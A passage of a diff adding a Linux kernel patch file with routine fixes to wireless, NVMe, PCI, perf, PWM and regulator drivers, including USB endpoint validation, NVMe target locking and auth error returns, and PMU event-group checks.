++			AR9170_USB_EP_TX | USB_DIR_OUT,
++			0};
++		u8 int_ep_addr[] = {
++			AR9170_USB_EP_IRQ | USB_DIR_IN,
++			AR9170_USB_EP_CMD | USB_DIR_OUT,
++			0};
++		if (!usb_check_bulk_endpoints(intf, bulk_ep_addr) ||
++		    !usb_check_int_endpoints(intf, int_ep_addr))
++			err = -ENODEV;
++	}
++
++	if (err) {
++		carl9170_free(ar);
++		return err;
++	}
++
+ 	usb_set_intfdata(intf, ar);
+ 	SET_IEEE80211_DEV(ar->hw, &intf->dev);
+ 
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
+index 3b1277a8bd617..99cc41135473a 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
+@@ -1640,6 +1640,15 @@ struct brcmf_random_seed_footer {
+ #define BRCMF_RANDOM_SEED_MAGIC		0xfeedc0de
+ #define BRCMF_RANDOM_SEED_LENGTH	0x100
+ 
++static noinline_for_stack void
++brcmf_pcie_provide_random_bytes(struct brcmf_pciedev_info *devinfo, u32 address)
++{
++	u8 randbuf[BRCMF_RANDOM_SEED_LENGTH];
++
++	get_random_bytes(randbuf, BRCMF_RANDOM_SEED_LENGTH);
++	memcpy_toio(devinfo->tcm + address, randbuf, BRCMF_RANDOM_SEED_LENGTH);
++}
++
+ static int brcmf_pcie_download_fw_nvram(struct brcmf_pciedev_info *devinfo,
+ 					const struct firmware *fw, void *nvram,
+ 					u32 nvram_len)
+@@ -1682,7 +1691,6 @@ static int brcmf_pcie_download_fw_nvram(struct brcmf_pciedev_info *devinfo,
+ 				.length = cpu_to_le32(rand_len),
+ 				.magic = cpu_to_le32(BRCMF_RANDOM_SEED_MAGIC),
+ 			};
+-			void *randbuf;
+ 
+ 			/* Some Apple chips/firmwares expect a buffer of random
+ 			 * data to be present before NVRAM
+@@ -1694,10 +1702,7 @@ static int brcmf_pcie_download_fw_nvram(struct brcmf_pciedev_info *devinfo,
+ 				    sizeof(footer));
+ 
+ 			address -= rand_len;
+-			randbuf = kzalloc(rand_len, GFP_KERNEL);
+-			get_random_bytes(randbuf, rand_len);
+-			memcpy_toio(devinfo->tcm + address, randbuf, rand_len);
+-			kfree(randbuf);
++			brcmf_pcie_provide_random_bytes(devinfo, address);
+ 		}
+ 	} else {
+ 		brcmf_dbg(PCIE, "No matching NVRAM file found %s\n",
+diff --git a/drivers/net/wireless/marvell/mwl8k.c b/drivers/net/wireless/marvell/mwl8k.c
+index 4dc7e2e53b81e..61697dad4ea61 100644
+--- a/drivers/net/wireless/marvell/mwl8k.c
++++ b/drivers/net/wireless/marvell/mwl8k.c
+@@ -2718,7 +2718,7 @@ __mwl8k_cmd_mac_multicast_adr(struct ieee80211_hw *hw, int allmulti,
+ 		cmd->action |= cpu_to_le16(MWL8K_ENABLE_RX_MULTICAST);
+ 		cmd->numaddr = cpu_to_le16(mc_count);
+ 		netdev_hw_addr_list_for_each(ha, mc_list) {
+-			memcpy(cmd->addr[i], ha->addr, ETH_ALEN);
++			memcpy(cmd->addr[i++], ha->addr, ETH_ALEN);
+ 		}
+ 	}
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7603/mac.c b/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
+index 2980e1234d13f..082ac1afc515a 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
+@@ -1382,6 +1382,7 @@ void mt7603_pse_client_reset(struct mt7603_dev *dev)
+ 		   MT_CLIENT_RESET_TX_R_E_2_S);
+ 
+ 	/* Start PSE client TX abort */
++	mt76_set(dev, MT_WPDMA_GLO_CFG, MT_WPDMA_GLO_CFG_FORCE_TX_EOF);
+ 	mt76_set(dev, addr, MT_CLIENT_RESET_TX_R_E_1);
+ 	mt76_poll_msec(dev, addr, MT_CLIENT_RESET_TX_R_E_1_S,
+ 		       MT_CLIENT_RESET_TX_R_E_1_S, 500);
+diff --git a/drivers/nvme/host/multipath.c b/drivers/nvme/host/multipath.c
+index f96d330d39641..6cf0ce7aff678 100644
+--- a/drivers/nvme/host/multipath.c
++++ b/drivers/nvme/host/multipath.c
+@@ -213,7 +213,8 @@ static struct nvme_ns *__nvme_find_path(struct nvme_ns_head *head, int node)
+ 		if (nvme_path_is_disabled(ns))
+ 			continue;
+ 
+-		if (READ_ONCE(head->subsys->iopolicy) == NVME_IOPOLICY_NUMA)
++		if (ns->ctrl->numa_node != NUMA_NO_NODE &&
++		    READ_ONCE(head->subsys->iopolicy) == NVME_IOPOLICY_NUMA)
+ 			distance = node_distance(node, ns->ctrl->numa_node);
+ 		else
+ 			distance = LOCAL_DISTANCE;
+diff --git a/drivers/nvme/target/auth.c b/drivers/nvme/target/auth.c
+index 4dcddcf95279b..e900525b78665 100644
+--- a/drivers/nvme/target/auth.c
++++ b/drivers/nvme/target/auth.c
+@@ -284,9 +284,9 @@ int nvmet_auth_host_hash(struct nvmet_req *req, u8 *response,
+ 	}
+ 
+ 	if (shash_len != crypto_shash_digestsize(shash_tfm)) {
+-		pr_debug("%s: hash len mismatch (len %d digest %d)\n",
+-			 __func__, shash_len,
+-			 crypto_shash_digestsize(shash_tfm));
++		pr_err("%s: hash len mismatch (len %d digest %d)\n",
++			__func__, shash_len,
++			crypto_shash_digestsize(shash_tfm));
+ 		ret = -EINVAL;
+ 		goto out_free_tfm;
+ 	}
+@@ -368,7 +368,7 @@ int nvmet_auth_host_hash(struct nvmet_req *req, u8 *response,
+ 	kfree_sensitive(host_response);
+ out_free_tfm:
+ 	crypto_free_shash(shash_tfm);
+-	return 0;
++	return ret;
+ }
+ 
+ int nvmet_auth_ctrl_hash(struct nvmet_req *req, u8 *response,
+diff --git a/drivers/nvme/target/configfs.c b/drivers/nvme/target/configfs.c
+index 73ae16059a1cb..2e87718aa194d 100644
+--- a/drivers/nvme/target/configfs.c
++++ b/drivers/nvme/target/configfs.c
+@@ -537,10 +537,18 @@ static ssize_t nvmet_ns_enable_store(struct config_item *item,
+ 	if (strtobool(page, &enable))
+ 		return -EINVAL;
+ 
++	/*
++	 * take a global nvmet_config_sem because the disable routine has a
++	 * window where it releases the subsys-lock, giving a chance to
++	 * a parallel enable to concurrently execute causing the disable to
++	 * have a misaccounting of the ns percpu_ref.
++	 */
++	down_write(&nvmet_config_sem);
+ 	if (enable)
+ 		ret = nvmet_ns_enable(ns);
+ 	else
+ 		nvmet_ns_disable(ns);
++	up_write(&nvmet_config_sem);
+ 
+ 	return ret ? ret : count;
+ }
+@@ -615,6 +623,18 @@ static struct configfs_attribute *nvmet_ns_attrs[] = {
+ 	NULL,
+ };
+ 
++bool nvmet_subsys_nsid_exists(struct nvmet_subsys *subsys, u32 nsid)
++{
++	struct config_item *ns_item;
++	char name[12];
++
++	snprintf(name, sizeof(name), "%u", nsid);
++	mutex_lock(&subsys->namespaces_group.cg_subsys->su_mutex);
++	ns_item = config_group_find_item(&subsys->namespaces_group, name);
++	mutex_unlock(&subsys->namespaces_group.cg_subsys->su_mutex);
++	return ns_item != NULL;
++}
++
+ static void nvmet_ns_release(struct config_item *item)
+ {
+ 	struct nvmet_ns *ns = to_nvmet_ns(item);
+diff --git a/drivers/nvme/target/core.c b/drivers/nvme/target/core.c
+index 3235baf7cc6b1..7b74926c50f9b 100644
+--- a/drivers/nvme/target/core.c
++++ b/drivers/nvme/target/core.c
+@@ -423,10 +423,13 @@ void nvmet_stop_keep_alive_timer(struct nvmet_ctrl *ctrl)
+ u16 nvmet_req_find_ns(struct nvmet_req *req)
+ {
+ 	u32 nsid = le32_to_cpu(req->cmd->common.nsid);
++	struct nvmet_subsys *subsys = nvmet_req_subsys(req);
+ 
+-	req->ns = xa_load(&nvmet_req_subsys(req)->namespaces, nsid);
++	req->ns = xa_load(&subsys->namespaces, nsid);
+ 	if (unlikely(!req->ns)) {
+ 		req->error_loc = offsetof(struct nvme_common_command, nsid);
++		if (nvmet_subsys_nsid_exists(subsys, nsid))
++			return NVME_SC_INTERNAL_PATH_ERROR;
+ 		return NVME_SC_INVALID_NS | NVME_SC_DNR;
+ 	}
+ 
+diff --git a/drivers/nvme/target/nvmet.h b/drivers/nvme/target/nvmet.h
+index 273cca49a040f..6aee0ce60a4ba 100644
+--- a/drivers/nvme/target/nvmet.h
++++ b/drivers/nvme/target/nvmet.h
+@@ -527,6 +527,7 @@ void nvmet_subsys_disc_changed(struct nvmet_subsys *subsys,
+ 		struct nvmet_host *host);
+ void nvmet_add_async_event(struct nvmet_ctrl *ctrl, u8 event_type,
+ 		u8 event_info, u8 log_page);
++bool nvmet_subsys_nsid_exists(struct nvmet_subsys *subsys, u32 nsid);
+ 
+ #define NVMET_QUEUE_SIZE	1024
+ #define NVMET_NR_QUEUES		128
+diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
+index 3480768274699..5556f55880411 100644
+--- a/drivers/nvme/target/tcp.c
++++ b/drivers/nvme/target/tcp.c
+@@ -297,6 +297,7 @@ static int nvmet_tcp_check_ddgst(struct nvmet_tcp_queue *queue, void *pdu)
+ 	return 0;
+ }
+ 
++/* If cmd buffers are NULL, no operation is performed */
+ static void nvmet_tcp_free_cmd_buffers(struct nvmet_tcp_cmd *cmd)
+ {
+ 	kfree(cmd->iov);
+@@ -1437,13 +1438,9 @@ static void nvmet_tcp_free_cmd_data_in_buffers(struct nvmet_tcp_queue *queue)
+ 	struct nvmet_tcp_cmd *cmd = queue->cmds;
+ 	int i;
+ 
+-	for (i = 0; i < queue->nr_cmds; i++, cmd++) {
+-		if (nvmet_tcp_need_data_in(cmd))
+-			nvmet_tcp_free_cmd_buffers(cmd);
+-	}
+-
+-	if (!queue->nr_cmds && nvmet_tcp_need_data_in(&queue->connect))
+-		nvmet_tcp_free_cmd_buffers(&queue->connect);
++	for (i = 0; i < queue->nr_cmds; i++, cmd++)
++		nvmet_tcp_free_cmd_buffers(cmd);
++	nvmet_tcp_free_cmd_buffers(&queue->connect);
+ }
+ 
+ static void nvmet_tcp_release_queue_work(struct work_struct *w)
+diff --git a/drivers/pci/controller/dwc/pcie-tegra194.c b/drivers/pci/controller/dwc/pcie-tegra194.c
+index 5d1ae2706f6ea..0839454fe4994 100644
+--- a/drivers/pci/controller/dwc/pcie-tegra194.c
++++ b/drivers/pci/controller/dwc/pcie-tegra194.c
+@@ -2250,11 +2250,14 @@ static int tegra_pcie_dw_probe(struct platform_device *pdev)
+ 		ret = tegra_pcie_config_ep(pcie, pdev);
+ 		if (ret < 0)
+ 			goto fail;
++		else
++			return 0;
+ 		break;
+ 
+ 	default:
+ 		dev_err(dev, "Invalid PCIe device type %d\n",
+ 			pcie->of_data->mode);
++		ret = -EINVAL;
+ 	}
+ 
+ fail:
+diff --git a/drivers/pci/pcie/edr.c b/drivers/pci/pcie/edr.c
+index 87734e4c3c204..35210007602c5 100644
+--- a/drivers/pci/pcie/edr.c
++++ b/drivers/pci/pcie/edr.c
+@@ -32,10 +32,10 @@ static int acpi_enable_dpc(struct pci_dev *pdev)
+ 	int status = 0;
+ 
+ 	/*
+-	 * Behavior when calling unsupported _DSM functions is undefined,
+-	 * so check whether EDR_PORT_DPC_ENABLE_DSM is supported.
++	 * Per PCI Firmware r3.3, sec 4.6.12, EDR_PORT_DPC_ENABLE_DSM is
++	 * optional. Return success if it's not implemented.
+ 	 */
+-	if (!acpi_check_dsm(adev->handle, &pci_acpi_dsm_guid, 5,
++	if (!acpi_check_dsm(adev->handle, &pci_acpi_dsm_guid, 6,
+ 			    1ULL << EDR_PORT_DPC_ENABLE_DSM))
+ 		return 0;
+ 
+@@ -46,12 +46,7 @@ static int acpi_enable_dpc(struct pci_dev *pdev)
+ 	argv4.package.count = 1;
+ 	argv4.package.elements = &req;
+ 
+-	/*
+-	 * Per Downstream Port Containment Related Enhancements ECN to PCI
+-	 * Firmware Specification r3.2, sec 4.6.12, EDR_PORT_DPC_ENABLE_DSM is
+-	 * optional.  Return success if it's not implemented.
+-	 */
+-	obj = acpi_evaluate_dsm(adev->handle, &pci_acpi_dsm_guid, 5,
++	obj = acpi_evaluate_dsm(adev->handle, &pci_acpi_dsm_guid, 6,
+ 				EDR_PORT_DPC_ENABLE_DSM, &argv4);
+ 	if (!obj)
+ 		return 0;
+@@ -85,8 +80,9 @@ static struct pci_dev *acpi_dpc_port_get(struct pci_dev *pdev)
+ 	u16 port;
+ 
+ 	/*
+-	 * Behavior when calling unsupported _DSM functions is undefined,
+-	 * so check whether EDR_PORT_DPC_ENABLE_DSM is supported.
++	 * If EDR_PORT_LOCATE_DSM is not implemented under the target of
++	 * EDR, the target is the port that experienced the containment
++	 * event (PCI Firmware r3.3, sec 4.6.13).
+ 	 */
+ 	if (!acpi_check_dsm(adev->handle, &pci_acpi_dsm_guid, 5,
+ 			    1ULL << EDR_PORT_LOCATE_DSM))
+@@ -103,6 +99,16 @@ static struct pci_dev *acpi_dpc_port_get(struct pci_dev *pdev)
+ 		return NULL;
+ 	}
+ 
++	/*
++	 * Bit 31 represents the success/failure of the operation. If bit
++	 * 31 is set, the operation failed.
++	 */
++	if (obj->integer.value & BIT(31)) {
++		ACPI_FREE(obj);
++		pci_err(pdev, "Locate Port _DSM failed\n");
++		return NULL;
++	}
++
+ 	/*
+ 	 * Firmware returns DPC port BDF details in following format:
+ 	 *	15:8 = bus
+diff --git a/drivers/perf/arm_dmc620_pmu.c b/drivers/perf/arm_dmc620_pmu.c
+index 54aa4658fb36e..535734dad2eb8 100644
+--- a/drivers/perf/arm_dmc620_pmu.c
++++ b/drivers/perf/arm_dmc620_pmu.c
+@@ -513,12 +513,16 @@ static int dmc620_pmu_event_init(struct perf_event *event)
+ 	if (event->cpu < 0)
+ 		return -EINVAL;
+ 
++	hwc->idx = -1;
++
++	if (event->group_leader == event)
++		return 0;
++
+ 	/*
+ 	 * We can't atomically disable all HW counters so only one event allowed,
+ 	 * although software events are acceptable.
+ 	 */
+-	if (event->group_leader != event &&
+-			!is_software_event(event->group_leader))
++	if (!is_software_event(event->group_leader))
+ 		return -EINVAL;
+ 
+ 	for_each_sibling_event(sibling, event->group_leader) {
+@@ -527,7 +531,6 @@ static int dmc620_pmu_event_init(struct perf_event *event)
+ 			return -EINVAL;
+ 	}
+ 
+-	hwc->idx = -1;
+ 	return 0;
+ }
+ 
+diff --git a/drivers/perf/hisilicon/hisi_pcie_pmu.c b/drivers/perf/hisilicon/hisi_pcie_pmu.c
+index c4c1cd269c577..49f2d69c119df 100644
+--- a/drivers/perf/hisilicon/hisi_pcie_pmu.c
++++ b/drivers/perf/hisilicon/hisi_pcie_pmu.c
+@@ -326,15 +326,27 @@ static bool hisi_pcie_pmu_validate_event_group(struct perf_event *event)
+ 			return false;
+ 
+ 		for (num = 0; num < counters; num++) {
++			/*
++			 * If we find a related event, then it's a valid group
++			 * since we don't need to allocate a new counter for it.
++			 */
+ 			if (hisi_pcie_pmu_cmp_event(event_group[num], sibling))
+ 				break;
+ 		}
+ 
++		/*
++		 * Otherwise it's a new event but if there's no available counter,
++		 * fail the check since we cannot schedule all the events in
++		 * the group simultaneously.
++		 */
++		if (num == HISI_PCIE_MAX_COUNTERS)
++			return false;
++
+ 		if (num == counters)
+ 			event_group[counters++] = sibling;
+ 	}
+ 
+-	return counters <= HISI_PCIE_MAX_COUNTERS;
++	return true;
+ }
+ 
+ static int hisi_pcie_pmu_event_init(struct perf_event *event)
+diff --git a/drivers/perf/hisilicon/hns3_pmu.c b/drivers/perf/hisilicon/hns3_pmu.c
+index 16869bf5bf4cc..60062eaa342aa 100644
+--- a/drivers/perf/hisilicon/hns3_pmu.c
++++ b/drivers/perf/hisilicon/hns3_pmu.c
+@@ -1085,15 +1085,27 @@ static bool hns3_pmu_validate_event_group(struct perf_event *event)
+ 			return false;
+ 
+ 		for (num = 0; num < counters; num++) {
++			/*
++			 * If we find a related event, then it's a valid group
++			 * since we don't need to allocate a new counter for it.
++			 */
+ 			if (hns3_pmu_cmp_event(event_group[num], sibling))
+ 				break;
+ 		}
+ 
++		/*
++		 * Otherwise it's a new event but if there's no available counter,
++		 * fail the check since we cannot schedule all the events in
++		 * the group simultaneously.
++		 */
++		if (num == HNS3_PMU_MAX_HW_EVENTS)
++			return false;
++
+ 		if (num == counters)
+ 			event_group[counters++] = sibling;
+ 	}
+ 
+-	return counters <= HNS3_PMU_MAX_HW_EVENTS;
++	return true;
+ }
+ 
+ static u32 hns3_pmu_get_filter_condition(struct perf_event *event)
+@@ -1515,7 +1527,7 @@ static int hns3_pmu_irq_register(struct pci_dev *pdev,
+ 		return ret;
+ 	}
+ 
+-	ret = devm_add_action(&pdev->dev, hns3_pmu_free_irq, pdev);
++	ret = devm_add_action_or_reset(&pdev->dev, hns3_pmu_free_irq, pdev);
+ 	if (ret) {
+ 		pci_err(pdev, "failed to add free irq action, ret = %d.\n", ret);
+ 		return ret;
+diff --git a/drivers/pwm/pwm-sti.c b/drivers/pwm/pwm-sti.c
+index 0a7920cbd4949..a0467f0b549c2 100644
+--- a/drivers/pwm/pwm-sti.c
++++ b/drivers/pwm/pwm-sti.c
+@@ -571,6 +571,7 @@ static int sti_pwm_probe(struct platform_device *pdev)
+ {
+ 	struct device *dev = &pdev->dev;
+ 	struct sti_pwm_compat_data *cdata;
++	struct pwm_chip *chip;
+ 	struct sti_pwm_chip *pc;
+ 	unsigned int i;
+ 	int irq, ret;
+@@ -578,6 +579,7 @@ static int sti_pwm_probe(struct platform_device *pdev)
+ 	pc = devm_kzalloc(dev, sizeof(*pc), GFP_KERNEL);
+ 	if (!pc)
+ 		return -ENOMEM;
++	chip = &pc->chip;
+ 
+ 	cdata = devm_kzalloc(dev, sizeof(*cdata), GFP_KERNEL);
+ 	if (!cdata)
+@@ -623,40 +625,28 @@ static int sti_pwm_probe(struct platform_device *pdev)
+ 		return ret;
+ 
+ 	if (cdata->pwm_num_devs) {
+-		pc->pwm_clk = of_clk_get_by_name(dev->of_node, "pwm");
++		pc->pwm_clk = devm_clk_get_prepared(dev, "pwm");
+ 		if (IS_ERR(pc->pwm_clk)) {
+ 			dev_err(dev, "failed to get PWM clock\n");
+ 			return PTR_ERR(pc->pwm_clk);
+ 		}
+-
+-		ret = clk_prepare(pc->pwm_clk);
+-		if (ret) {
+-			dev_err(dev, "failed to prepare clock\n");
+-			return ret;
+-		}
+ 	}
+ 
+ 	if (cdata->cpt_num_devs) {
+-		pc->cpt_clk = of_clk_get_by_name(dev->of_node, "capture");
++		pc->cpt_clk = devm_clk_get_prepared(dev, "capture");
+ 		if (IS_ERR(pc->cpt_clk)) {
+ 			dev_err(dev, "failed to get PWM capture clock\n");
+ 			return PTR_ERR(pc->cpt_clk);
+ 		}
+ 
+-		ret = clk_prepare(pc->cpt_clk);
+-		if (ret) {
+-			dev_err(dev, "failed to prepare clock\n");
+-			return ret;
+-		}
+-
+ 		cdata->ddata = devm_kzalloc(dev, cdata->cpt_num_devs * sizeof(*cdata->ddata), GFP_KERNEL);
+ 		if (!cdata->ddata)
+ 			return -ENOMEM;
+ 	}
+ 
+-	pc->chip.dev = dev;
+-	pc->chip.ops = &sti_pwm_ops;
+-	pc->chip.npwm = max(cdata->pwm_num_devs, cdata->cpt_num_devs);
++	chip->dev = dev;
++	chip->ops = &sti_pwm_ops;
++	chip->npwm = max(cdata->pwm_num_devs, cdata->cpt_num_devs);
+ 
+ 	for (i = 0; i < cdata->cpt_num_devs; i++) {
+ 		struct sti_cpt_ddata *ddata = &cdata->ddata[i];
+@@ -665,28 +655,7 @@ static int sti_pwm_probe(struct platform_device *pdev)
+ 		mutex_init(&ddata->lock);
+ 	}
+ 
+-	ret = pwmchip_add(&pc->chip);
+-	if (ret < 0) {
+-		clk_unprepare(pc->pwm_clk);
+-		clk_unprepare(pc->cpt_clk);
+-		return ret;
+-	}
+-
+-	platform_set_drvdata(pdev, pc);
+-
+-	return 0;
+-}
+-
+-static int sti_pwm_remove(struct platform_device *pdev)
+-{
+-	struct sti_pwm_chip *pc = platform_get_drvdata(pdev);
+-
+-	pwmchip_remove(&pc->chip);
+-
+-	clk_unprepare(pc->pwm_clk);
+-	clk_unprepare(pc->cpt_clk);
+-
+-	return 0;
++	return devm_pwmchip_add(dev, chip);
+ }
+ 
+ static const struct of_device_id sti_pwm_of_match[] = {
+@@ -701,7 +670,6 @@ static struct platform_driver sti_pwm_driver = {
+ 		.of_match_table = sti_pwm_of_match,
+ 	},
+ 	.probe = sti_pwm_probe,
+-	.remove = sti_pwm_remove,
+ };
+ module_platform_driver(sti_pwm_driver);
+ 
+diff --git a/drivers/regulator/bd71828-regulator.c b/drivers/regulator/bd71828-regulator.c
+index a4f09a5a30cab..d07f0d120ca71 100644
+--- a/drivers/regulator/bd71828-regulator.c
++++ b/drivers/regulator/bd71828-regulator.c
+@@ -207,14 +207,11 @@ static const struct bd71828_regulator_data bd71828_rdata[] = {
+ 			.suspend_reg = BD71828_REG_BUCK1_SUSP_VOLT,
+ 			.suspend_mask = BD71828_MASK_BUCK1267_VOLT,
+ 			.suspend_on_mask = BD71828_MASK_SUSP_EN,
+-			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+ 			/*
+ 			 * LPSR voltage is same as SUSPEND voltage. Allow
+-			 * setting it so that regulator can be set enabled at
+-			 * LPSR state
++			 * only enabling/disabling regulator for LPSR state
+ 			 */
+-			.lpsr_reg = BD71828_REG_BUCK1_SUSP_VOLT,
+-			.lpsr_mask = BD71828_MASK_BUCK1267_VOLT,
++			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+ 		},
+ 		.reg_inits = buck1_inits,
+ 		.reg_init_amnt = ARRAY_SIZE(buck1_inits),
+@@ -289,13 +286,7 @@ static const struct bd71828_regulator_data bd71828_rdata[] = {
+ 				     ROHM_DVS_LEVEL_SUSPEND |
+ 				     ROHM_DVS_LEVEL_LPSR,
+ 			.run_reg = BD71828_REG_BUCK3_VOLT,
+-			.idle_reg = BD71828_REG_BUCK3_VOLT,
+-			.suspend_reg = BD71828_REG_BUCK3_VOLT,
+-			.lpsr_reg = BD71828_REG_BUCK3_VOLT,
+ 			.run_mask = BD71828_MASK_BUCK3_VOLT,
+-			.idle_mask = BD71828_MASK_BUCK3_VOLT,
+-			.suspend_mask = BD71828_MASK_BUCK3_VOLT,
+-			.lpsr_mask = BD71828_MASK_BUCK3_VOLT,
+ 			.idle_on_mask = BD71828_MASK_IDLE_EN,
+ 			.suspend_on_mask = BD71828_MASK_SUSP_EN,
+ 			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+@@ -330,13 +321,7 @@ static const struct bd71828_regulator_data bd71828_rdata[] = {
+ 				     ROHM_DVS_LEVEL_SUSPEND |
+ 				     ROHM_DVS_LEVEL_LPSR,
+ 			.run_reg = BD71828_REG_BUCK4_VOLT,
+-			.idle_reg = BD71828_REG_BUCK4_VOLT,
+-			.suspend_reg = BD71828_REG_BUCK4_VOLT,
+-			.lpsr_reg = BD71828_REG_BUCK4_VOLT,
+ 			.run_mask = BD71828_MASK_BUCK4_VOLT,
+-			.idle_mask = BD71828_MASK_BUCK4_VOLT,
+-			.suspend_mask = BD71828_MASK_BUCK4_VOLT,
+-			.lpsr_mask = BD71828_MASK_BUCK4_VOLT,
+ 			.idle_on_mask = BD71828_MASK_IDLE_EN,
+ 			.suspend_on_mask = BD71828_MASK_SUSP_EN,
+ 			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+@@ -371,13 +356,7 @@ static const struct bd71828_regulator_data bd71828_rdata[] = {
+ 				     ROHM_DVS_LEVEL_SUSPEND |
+ 				     ROHM_DVS_LEVEL_LPSR,
+ 			.run_reg = BD71828_REG_BUCK5_VOLT,
+-			.idle_reg = BD71828_REG_BUCK5_VOLT,
+-			.suspend_reg = BD71828_REG_BUCK5_VOLT,
+-			.lpsr_reg = BD71828_REG_BUCK5_VOLT,
+ 			.run_mask = BD71828_MASK_BUCK5_VOLT,
+-			.idle_mask = BD71828_MASK_BUCK5_VOLT,
+-			.suspend_mask = BD71828_MASK_BUCK5_VOLT,
+-			.lpsr_mask = BD71828_MASK_BUCK5_VOLT,
+ 			.idle_on_mask = BD71828_MASK_IDLE_EN,
+ 			.suspend_on_mask = BD71828_MASK_SUSP_EN,
+ 			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+@@ -494,13 +473,7 @@ static const struct bd71828_regulator_data bd71828_rdata[] = {
+ 				     ROHM_DVS_LEVEL_SUSPEND |
+ 				     ROHM_DVS_LEVEL_LPSR,
+ 			.run_reg = BD71828_REG_LDO1_VOLT,
+-			.idle_reg = BD71828_REG_LDO1_VOLT,
+-			.suspend_reg = BD71828_REG_LDO1_VOLT,
+-			.lpsr_reg = BD71828_REG_LDO1_VOLT,
+ 			.run_mask = BD71828_MASK_LDO_VOLT,
+-			.idle_mask = BD71828_MASK_LDO_VOLT,
+-			.suspend_mask = BD71828_MASK_LDO_VOLT,
+-			.lpsr_mask = BD71828_MASK_LDO_VOLT,
+ 			.idle_on_mask = BD71828_MASK_IDLE_EN,
+ 			.suspend_on_mask = BD71828_MASK_SUSP_EN,
+ 			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+@@ -534,13 +507,7 @@ static const struct bd71828_regulator_data bd71828_rdata[] = {
+ 				     ROHM_DVS_LEVEL_SUSPEND |
+ 				     ROHM_DVS_LEVEL_LPSR,
+ 			.run_reg = BD71828_REG_LDO2_VOLT,
+-			.idle_reg = BD71828_REG_LDO2_VOLT,
+-			.suspend_reg = BD71828_REG_LDO2_VOLT,
+-			.lpsr_reg = BD71828_REG_LDO2_VOLT,
+ 			.run_mask = BD71828_MASK_LDO_VOLT,
+-			.idle_mask = BD71828_MASK_LDO_VOLT,
+-			.suspend_mask = BD71828_MASK_LDO_VOLT,
+-			.lpsr_mask = BD71828_MASK_LDO_VOLT,
+ 			.idle_on_mask = BD71828_MASK_IDLE_EN,
+ 			.suspend_on_mask = BD71828_MASK_SUSP_EN,
+ 			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+@@ -574,13 +541,7 @@ static const struct bd71828_regulator_data bd71828_rdata[] = {
+ 				     ROHM_DVS_LEVEL_SUSPEND |
+ 				     ROHM_DVS_LEVEL_LPSR,
+ 			.run_reg = BD71828_REG_LDO3_VOLT,
+-			.idle_reg = BD71828_REG_LDO3_VOLT,
+-			.suspend_reg = BD71828_REG_LDO3_VOLT,
+-			.lpsr_reg = BD71828_REG_LDO3_VOLT,
+ 			.run_mask = BD71828_MASK_LDO_VOLT,
+-			.idle_mask = BD71828_MASK_LDO_VOLT,
+-			.suspend_mask = BD71828_MASK_LDO_VOLT,
+-			.lpsr_mask = BD71828_MASK_LDO_VOLT,
+ 			.idle_on_mask = BD71828_MASK_IDLE_EN,
+ 			.suspend_on_mask = BD71828_MASK_SUSP_EN,
+ 			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+@@ -615,13 +576,7 @@ static const struct bd71828_regulator_data bd71828_rdata[] = {
+ 				     ROHM_DVS_LEVEL_SUSPEND |
+ 				     ROHM_DVS_LEVEL_LPSR,
+ 			.run_reg = BD71828_REG_LDO4_VOLT,
+-			.idle_reg = BD71828_REG_LDO4_VOLT,
+-			.suspend_reg = BD71828_REG_LDO4_VOLT,
+-			.lpsr_reg = BD71828_REG_LDO4_VOLT,
+ 			.run_mask = BD71828_MASK_LDO_VOLT,
+-			.idle_mask = BD71828_MASK_LDO_VOLT,
+-			.suspend_mask = BD71828_MASK_LDO_VOLT,
+-			.lpsr_mask = BD71828_MASK_LDO_VOLT,
+ 			.idle_on_mask = BD71828_MASK_IDLE_EN,
+ 			.suspend_on_mask = BD71828_MASK_SUSP_EN,
+ 			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+@@ -656,13 +611,7 @@ static const struct bd71828_regulator_data bd71828_rdata[] = {
+ 				     ROHM_DVS_LEVEL_SUSPEND |
+ 				     ROHM_DVS_LEVEL_LPSR,
+ 			.run_reg = BD71828_REG_LDO5_VOLT,
+-			.idle_reg = BD71828_REG_LDO5_VOLT,
+-			.suspend_reg = BD71828_REG_LDO5_VOLT,
+-			.lpsr_reg = BD71828_REG_LDO5_VOLT,
+ 			.run_mask = BD71828_MASK_LDO_VOLT,
+-			.idle_mask = BD71828_MASK_LDO_VOLT,
+-			.suspend_mask = BD71828_MASK_LDO_VOLT,
+-			.lpsr_mask = BD71828_MASK_LDO_VOLT,
+ 			.idle_on_mask = BD71828_MASK_IDLE_EN,
+ 			.suspend_on_mask = BD71828_MASK_SUSP_EN,
+ 			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+@@ -721,9 +670,6 @@ static const struct bd71828_regulator_data bd71828_rdata[] = {
+ 			.suspend_reg = BD71828_REG_LDO7_VOLT,
+ 			.lpsr_reg = BD71828_REG_LDO7_VOLT,
+ 			.run_mask = BD71828_MASK_LDO_VOLT,
+-			.idle_mask = BD71828_MASK_LDO_VOLT,
+-			.suspend_mask = BD71828_MASK_LDO_VOLT,
+-			.lpsr_mask = BD71828_MASK_LDO_VOLT,
+ 			.idle_on_mask = BD71828_MASK_IDLE_EN,
+ 			.suspend_on_mask = BD71828_MASK_SUSP_EN,
+ 			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+diff --git a/drivers/regulator/irq_helpers.c b/drivers/regulator/irq_helpers.c
+index fe7ae0f3f46af..5ab1a0befe12f 100644
+--- a/drivers/regulator/irq_helpers.c
++++ b/drivers/regulator/irq_helpers.c
+@@ -352,6 +352,9 @@ void *regulator_irq_helper(struct device *dev,
+ 
+ 	h->irq = irq;
